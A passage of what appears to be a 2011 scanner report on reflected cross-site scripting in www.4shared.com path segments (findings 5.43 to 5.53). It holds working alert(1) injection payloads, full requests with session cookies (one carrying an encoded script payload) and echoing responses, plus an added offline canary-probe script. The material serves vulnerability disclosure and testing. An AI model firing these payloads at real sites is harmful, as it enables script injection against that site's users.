function feedback() {

...[SNIP]...

5.43. http://www.4shared.com/m/symbian.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/symbian.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50ceb"-alert(1)-"9c67985142f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m/symbian.jsp50ceb"-alert(1)-"9c67985142f HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m/symbian.jsp50ceb&quot;-alert(1)-&quot;9c67985142f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A6C24D0B2E2E5D66858D67429BC70026.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:44 GMT
Connection: close
Content-Length: 36128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m/symbian.jsp50ceb"-alert(1)-"9c67985142f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.44. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /main/translate/setLang.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39736"-alert(1)-"1ec01b6de0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main39736"-alert(1)-"1ec01b6de0e/translate/setLang.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /main39736&quot;-alert(1)-&quot;1ec01b6de0e/translate/setLang.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F73CC572AF956E9F72337A2529924ADE.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:04 GMT
Connection: close
Content-Length: 36193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/main39736"-alert(1)-"1ec01b6de0e/translate/setLang.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

5.45. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /main/translate/setLang.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11c9c"-alert(1)-"b3e63033d79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main/translate11c9c"-alert(1)-"b3e63033d79/setLang.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /main/translate11c9c&quot;-alert(1)-&quot;b3e63033d79/setLang.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D6E0A71945AFFA927BE3920160757DB9.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:11 GMT
Connection: close
Content-Length: 36193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/main/translate11c9c"-alert(1)-"b3e63033d79/setLang.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.46. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /main/translate/setLang.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77fc0"-alert(1)-"030cd898f55 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main/translate/setLang.jsp77fc0"-alert(1)-"030cd898f55 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /main/translate/setLang.jsp77fc0&quot;-alert(1)-&quot;030cd898f55
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=87EA3869ED34688155236636B5D3476F.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:21 GMT
Connection: close
Content-Length: 36193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/main/translate/setLang.jsp77fc0"-alert(1)-"030cd898f55";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...
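
Findings 5.44, 5.45 and 5.46 are the same sink reached through each of the three path segments of /main/translate/setLang.jsp. The following added example (not code from the report, from Burp, or from 4shared.com) shows how a "REST URL parameter N" finding is derived and how to keep it as a regression check: each segment is mutated in turn with a canary containing a double quote, the page is fetched, and the response is inspected for the canary landing raw inside a script element. Because the example must run offline, the target is a constructed in-process handler modelled on the 404 responses above, with a second constructed handler that follows the remediation text literally (fixed link, nothing echoed); the function names, the canary format and both handlers are assumptions. Replace fetchPage with a real HTTP client to run it against a live host. Node.js, no dependencies.

```javascript
// Added example (not from the report or from 4shared.com): per-segment
// reflection probe of the kind that produced findings 5.44-5.46.

// Constructed stand-in for the 4shared 404 page: echoes the raw request path
// into reportAbuse(), like the responses in findings 5.38-5.46.
function echoing404Handler(path) {
  return [
    '<html><head><title>4shared.com - 404</title>',
    '<script type="text/javascript">',
    'function reportAbuse() {',
    'var windowname="abuse";',
    'var url="/abuse.jsp?aLink=http://www.4shared.com' + path + '";',
    '}',
    '</script></head><body>Not found</body></html>',
  ].join('\n');
}

// Constructed hardened stand-in that applies the remediation text literally:
// the abuse link is a fixed value and the request path is never echoed.
function fixedLink404Handler(_path) {
  return [
    '<html><head><title>4shared.com - 404</title>',
    '<script type="text/javascript">',
    'function reportAbuse() {',
    'var url="/abuse.jsp?aLink=http://www.4shared.com/";',
    '}',
    '</script></head><body>Not found</body></html>',
  ].join('\n');
}

// Burp-style canary: distinctive delimiters around a double quote so the
// reflection can be located unambiguously.  Fixed here for reproducibility;
// a real run should randomise the delimiters per request.
function canaryFor(segmentIndex) {
  return 'c' + segmentIndex + 'a7f"-x-"b3e' + segmentIndex;
}

// Split "/main/translate/setLang.jsp" into REST URL parameters 1..N.
function pathSegments(path) {
  return path.split('/').filter((s) => s.length > 0);
}

// True when the canary appears with its quote intact inside a <script>
// element.  A raw quote surviving into script source is enough to flag;
// Burp additionally confirms the exact syntactic context (here, a
// double-quoted string), which a fuller checker would tokenise to decide.
function canaryReflectedRawInScript(body, canary) {
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(body)) !== null) {
    if (m[1].includes(canary)) return true;
  }
  return false;
}

// Append a canary to each segment in turn (the scanner's "REST URL parameter
// N" mutation), fetch the page, and report which segments reach the sink.
function probeRestSegments(path, fetchPage) {
  const segments = pathSegments(path);
  const trailingSlash = path.endsWith('/') ? '/' : '';
  return segments.map((_seg, i) => {
    const canary = canaryFor(i + 1);
    const mutated = segments.map((s, j) => (j === i ? s + canary : s));
    const probePath = '/' + mutated.join('/') + trailingSlash;
    const body = fetchPage(probePath);
    return {
      parameter: i + 1,
      probePath,
      reflectedInJsString: canaryReflectedRawInScript(body, canary),
    };
  });
}

console.log(probeRestSegments('/main/translate/setLang.jsp', echoing404Handler));
console.log(probeRestSegments('/main/translate/setLang.jsp', fixedLink404Handler));
```

Against the echoing handler all three segments come back flagged, matching the three findings; against the fixed-link handler none do. Server-side JavaScript-string encoding of the path would also pass this check, since the canary's quote would arrive as \x22 rather than raw, whereas HTML entity encoding would pass it only by corrupting the link value, which is a hint that the wrong encoder was chosen.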

5.47. http://www.4shared.com/oauth/startFacebookLogin.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /oauth/startFacebookLogin.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17562"-alert(1)-"aa3f9a7695c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /oauth17562"-alert(1)-"aa3f9a7695c/startFacebookLogin.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /oauth17562&quot;-alert(1)-&quot;aa3f9a7695c/startFacebookLogin.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8154EA1F3F4FF79D5646E442478F4DB6.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:44 GMT
Connection: close
Content-Length: 36203


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/oauth17562"-alert(1)-"aa3f9a7695c/startFacebookLogin.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feed
...[SNIP]...

5.48. http://www.4shared.com/oauth/startFacebookLogin.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /oauth/startFacebookLogin.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4481d"-alert(1)-"c7de45f4dcb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /oauth/startFacebookLogin.jsp4481d"-alert(1)-"c7de45f4dcb HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /oauth/startFacebookLogin.jsp4481d&quot;-alert(1)-&quot;c7de45f4dcb
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=621C418861194619D182939BF9069DC2.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:50 GMT
Connection: close
Content-Length: 36203


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/oauth/startFacebookLogin.jsp4481d"-alert(1)-"c7de45f4dcb";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.49. http://www.4shared.com/premium.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb2ec"-alert(1)-"e169cb5f37d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /premium.jspcb2ec"-alert(1)-"e169cb5f37d HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /premium.jspcb2ec&quot;-alert(1)-&quot;e169cb5f37d
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1A92818CFB6F551716E7018166B205B6.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:00 GMT
Connection: close
Content-Length: 36118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/premium.jspcb2ec"-alert(1)-"e169cb5f37d";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.50. http://www.4shared.com/press_room/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /press_room/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94440"-alert(1)-"30c8fdbfe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /press_room94440"-alert(1)-"30c8fdbfe4/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /press_room94440&quot;-alert(1)-&quot;30c8fdbfe4/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5D48B010F53E401E07A710D3F1BC1A7B.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:13 GMT
Connection: close
Content-Length: 36102


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/press_room94440"-alert(1)-"30c8fdbfe4/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

5.51. http://www.4shared.com/privacy.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /privacy.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35670"-alert(1)-"3015378b77f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy.jsp35670"-alert(1)-"3015378b77f HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /privacy.jsp35670&quot;-alert(1)-&quot;3015378b77f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9CA83E4A7CCCE2745DB3EEC1AE1A1846.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:42 GMT
Connection: close
Content-Length: 36107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/privacy.jsp35670"-alert(1)-"3015378b77f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.52. http://www.4shared.com/q/BAQD/1/books_office [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BAQD/1/books_office

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f84fe"-alert(1)-"086eb606b7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f84fe"-alert(1)-"086eb606b7a/BAQD/1/books_office HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /f84fe&quot;-alert(1)-&quot;086eb606b7a/BAQD/1/books_office
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=28AE5917D14DA5B988790134206A2EC8.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:49 GMT
Connection: close
Content-Length: 36152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/f84fe"-alert(1)-"086eb606b7a/BAQD/1/books_office";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

5.53. http://www.4shared.com/q/BAQD/1/music [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BAQD/1/music

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8ddd"-alert(1)-"4eb60d1a81f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d8ddd"-alert(1)-"4eb60d1a81f/BAQD/1/music HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
